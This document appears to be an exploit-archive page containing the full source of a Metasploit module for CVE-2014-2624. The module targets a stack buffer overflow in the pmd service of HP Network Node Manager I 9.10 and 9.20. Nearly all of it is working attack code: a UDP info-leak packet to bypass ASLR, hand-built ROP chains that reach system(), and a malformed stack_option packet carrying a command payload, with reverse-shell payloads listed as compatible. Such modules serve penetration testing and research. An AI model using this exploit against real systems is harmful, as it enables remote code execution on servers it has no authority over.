HP Network Node Manager I PMD Buffer Overflow Exploit

2014-10-02T00:00:00
ID 1337DAY-ID-22714
Type zdt
Reporter metasploit
Modified 2014-10-02T00:00:00

Description

Exploit for linux platform in category remote exploits

                                        
                                            ##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking
 
  include Msf::Exploit::Remote::Udp
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'HP Network Node Manager I PMD Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack buffer overflow in HP Network Node Manager I (NNMi). The
        vulnerability exists in the pmd service, due to the insecure usage of functions like
        strcpy and strcat while handling stack_option packets with user controlled data. In
        order to bypass ASLR this module uses a proto_tbl packet to leak an libov pointer from
        the stack and finally build the rop chain to avoid NX.
      },
      'Author'         =>
        [
          'd(-_-)b',     # Vulnerability discovery
          'juan vazquez' # Metasploit module
        ],
      'References'     =>
        [
          ['CVE', '2014-2624'],
          ['ZDI', '14-305']
        ],
      'Payload'        =>
        {
          'BadChars'    => "\x00",
          'Space'       => 3000,
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd cmd_bash',
              'RequiredCmd' => 'generic python perl openssl bash-tcp gawk'
            }
        },
      'Arch'           => ARCH_CMD,
      'Platform'       => 'unix',
      'Targets'        =>
        [
          ['Automatic', {}],
          ['HP NNMi 9.10 / CentOS 5',
            {
              # ptr to .rodata with format specifier
              #.rodata:0003BE86 aS_1            db '%s',0
              'ov_offset'      => 0x3BE86,
              :rop             => :rop_hp_nnmi_9_10
            }
          ],
          ['HP NNMi 9.20 / CentOS 6',
            {
              # ptr to .rodata with format specifier
              #.rodata:0003C2D6 aS_1            db '%s',0
              'ov_offset'      => 0x3c2d8,
              :rop             => :rop_hp_nnmi_9_20
            }
          ]
        ],
      'Privileged'     => false, # true for HP NNMi 9.10, false for HP NNMi 9.20
      'DisclosureDate' => 'Sep 09 2014',
      'DefaultTarget'  => 0
      ))
 
    register_options([ Opt::RPORT(7426) ], self.class)
  end
 
  def check
    header = [
      0x2a5,  # pmdmgr_init pkt
      0x3cc,  # signature
      0xa0c,  # signature
      0xca8   # signature
    ].pack("V")
 
    data = "\x00" * (0xfa4 - header.length)
 
    pkt = header + data
 
    connect_udp
    udp_sock.put(pkt)
    res = udp_sock.timed_read(8, 1)
    if res.blank?
      # To mitigate MacOSX udp sockets behavior
      # see https://dev.metasploit.com/redmine/issues/7480
      udp_sock.put(pkt)
      res = udp_sock.timed_read(8)
    end
    disconnect_udp
 
    if res.blank?
      return Exploit::CheckCode::Unknown
    elsif res.length == 8 && res.unpack("V").first == 0x2a5
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Unknown
    end
  end
 
  def exploit
    connect_udp
    # info leak with a "proto_tbl" packet
    print_status("Sending a 'proto_tbl' request...")
    udp_sock.put(proto_tbl_pkt)
 
    res = udp_sock.timed_read(13964, 1)
    if res.blank?
      # To mitigate MacOSX udp sockets behavior
      # see https://dev.metasploit.com/redmine/issues/7480
      udp_sock.put(proto_tbl_pkt)
      res = udp_sock.timed_read(13964)
    end
 
    if res.blank?
      fail_with(Failure::Unknown, "Unable to get a 'proto_tbl' response...")
    end
 
    if target.name == 'Automatic'
      print_status("Fingerprinting target...")
      my_target = auto_target(res)
      fail_with(Failure::NoTarget, "Unable to autodetect target...") if my_target.nil?
    else
      my_target = target
      fail_with(Failure::Unknown, "Unable to leak libov base address...") unless find_ov_base(my_target, res)
    end
 
    print_good("Exploiting #{my_target.name} with libov base address at 0x#{@ov_base.to_s(16)}...")
 
    # exploit with a "stack_option_pkt" packet
    udp_sock.put(stack_option_pkt(my_target, @ov_base))
 
    disconnect_udp
  end
 
  def rop_hp_nnmi_9_10(ov_base)
    rop = rand_text_alpha(775)
    rop << [0x808d7c1].pack("V")          # pop ebx ; pop ebp ; ret
    rop << [ov_base + 0x481A8].pack("V")  # ebx: libov .got
    rop << [0x8096540].pack("V")          # ptr to .data where user controlled string will be stored:
                                          # "PMD Stack option specified, but stack not available (user_controlled)"
    rop << [0x808d7c2].pack("V")          # pop ebp # ret
    rop << [0x08096540 + 4732].pack("V")  # ebp: ptr to our controlled data in .data (+0x1028 to compensate)
    rop << [ov_base +  0x1D692].pack("V") # ptr to 'call _system' sequence:
                                          #.text:0001D692  lea     eax, [ebp+dest]
                                          #.text:0001D698  push    eax             ; command
                                          #.text:0001D699  call    _system
    rop
  end
 
  def rop_hp_nnmi_9_20(ov_base)
    rop = rand_text_alpha(775)
    rop << [0x808dd70].pack("V")                      # pop eax ; pop ebx ; pop ebp ; ret
    rop << [0xf7f61cd0 + ov_base + 0x1dae6].pack("V") # eax: ptr to 'call _system' sequence
                                                      #.text:0001DAE6  lea     eax, [ebp+dest] (dest = -0x1028)
                                                      #.text:0001DAEC  push    eax             ; command
                                                      #.text:0001DAED  call    _system
    rop << [0x08097160].pack("V")                     # ebx: ptr to .data where user controlled string will be stored:
                                                      # "PMD Stack option specified, but stack not available (user_controlled)"
    rop << rand_text_alpha(4)                         # ebp: padding
    rop << [0x804fb86].pack("V")                      # add eax 0x809e330 ; add ecx ecx ; ret (control eax)
    rop << [0x8049ac4].pack("V")                      # xchg eax, edi ; ret
    rop << [0x808dd70].pack("V")                      # pop eax ; pop ebx ; pop ebp ; ret
    rop << [0xf7f61cd0 + ov_base + 0x47f1c].pack("V") # eax: libov .got base
    rop << rand_text_alpha(4)                         # ebx: padding
    rop << [0x8097160 + 4764].pack("V")               # ebp: ptr to our controlled data in .data (+0x1028 to compensate)
    rop << [0x804fb86].pack("V")                      # add eax 0x809e330 ; add ecx ecx ; ret (control eax)
    rop << [0x805a58d].pack("V")                      # xchg ebx eax ; and eax 0xc4830001 ; and cl cl ; ret (ebx: libov .got)
    rop << [0x8049ac4].pack("V")                      # xchg eax, edi ; ret ; (eax: call to system sequence from libov)
    rop << [0x80528BC].pack("V")                      # jmp eax
 
    rop
  end
 
  def stack_option_pkt(t, ov_base)
    hdr = [0x2a9].pack("V")             # stack_option packet
    data = "-SA"                        # stack name (invalid one 'A')
    data << ";"                         # separator
    data << self.send(t[:rop], ov_base) # malformed stack options
    data << payload.encoded
    data << ";\n"
    data << "\x00" * (0xfa4 - data.length - hdr.length)
 
    hdr + data
  end
 
  def proto_tbl_pkt
    hdr = [0x2aa].pack("V") # proto_tbl packet
    data = "\x00" * (0xfa4 - hdr.length)
 
    hdr + data
  end
 
  def base(address, offset)
    address - offset
  end
 
  def find_ov_base(t, data)
    print_status("Searching #{t.name} pointers...")
    i = 0
    data.unpack("V*").each do |int|
      if base(int, t['ov_offset']) % 0x1000 == 0
        print_status("Pointer 0x#{int.to_s(16)} found at offset #{i * 4}")
        @ov_base = base(int, t['ov_offset'])
        return true
      end
      i = i + 1
    end
 
    false
  end
 
  def auto_target(data)
    targets.each do |t|
      next if t.name == 'Automatic'
      if find_ov_base(t, data)
        return t
      end
    end
 
    nil
  end
 
end

#  0day.today [2018-04-02]  #